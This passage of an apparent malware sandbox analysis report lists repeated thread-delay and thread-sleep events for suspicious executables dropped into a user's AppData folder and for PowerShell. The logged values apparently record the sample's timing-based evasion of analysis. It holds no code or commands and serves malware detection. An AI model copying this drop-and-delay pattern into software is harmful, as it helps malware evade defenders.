                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599656
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599547
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599436
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599327
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599218
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 599000
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 598891
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 598781
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 598657
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 598491
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 598382
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 598235
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 597923
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 597729
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 597620
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 597457
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 597328
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 597182
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 597063
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 596936
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 596768
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 596641
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 596520
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 596360
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 596226
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 596112
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 595990
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 595860
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 595735
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 595610
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 595485
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594948
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594823
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594713
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594594
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594484
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594375
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594266
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594156
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 594047
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 593931
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 593813
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 593698
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 593578
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 593469
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 593344
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeThread delayed: delay time: 593234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599765
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599656
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599545
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599219
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598999
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598671
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598551
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598422
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598312
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598187
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598039
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597929
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597812
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597702
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597593
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597470
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597344
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597219
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596670
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596452
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596344
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596125
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596015
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595906
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595788
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595672
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595489
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595227
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594994
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594854
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594749
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594640
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594531
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594422
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594312
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594203
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599765
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599656
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599546
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599327
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599218
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598999
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598671
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598452
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598342
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598234
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597996
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597871
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597747
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597640
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597531
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597422
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597312
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597202
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597091
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596984
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596874
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596765
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596656
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596435
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596218
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596109
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595890
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595781
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595671
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595562
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595439
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595312
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595202
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595045
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594934
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594812
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594703
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594593
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594484
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594374
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9065Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 576Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8919Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 674Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeWindow / User API: threadDelayed 7128Jump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exeWindow / User API: threadDelayed 2703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeWindow / User API: threadDelayed 4603
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exeWindow / User API: threadDelayed 5236
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 6736
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 3111
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 2472
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 7371
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 7536Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep count: 9065 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep count: 576 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8052Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -599890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -599746s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -599637s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -599515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -599406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -599297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -599187s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -599078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -598967s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -598859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -598709s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -598578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -598440s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -598312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -598180s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -598078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -597968s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -597859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -597750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -597640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -597530s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -597422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -597297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -597186s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -597073s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -596968s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -596859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -596746s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -596629s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -596500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -596390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -596281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -596171s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -596062s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -595952s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -595837s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -595715s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -595592s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -595437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -595323s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -595218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -595109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -595000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -594890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -594781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -594672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -594562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -594453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -594343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -594232s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\s2Jg1MAahY.exe TID: 8180Thread sleep time: -594124s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -40582836962160988s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -599875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -599766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -599656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -599547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -599436s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -599327s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -599218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -599109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -599000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -598891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -598781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -598657s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -598491s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -598382s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -598235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -597923s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -597729s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -597620s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -597457s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -597328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -597182s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -597063s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -596936s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -596768s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -596641s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -596520s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -596360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -596226s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -596112s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -595990s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -595860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -595735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -595610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -595485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -594948s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -594823s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -594713s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -594594s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -594484s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -594375s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -594266s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -594156s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -594047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -593931s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -593813s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -593698s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -593578s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -593469s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -593344s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GedTanqRR.exe TID: 7688Thread sleep time: -593234s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7244Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -34126476536362649s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 8020Thread sleep time: -600000s >= -30000s
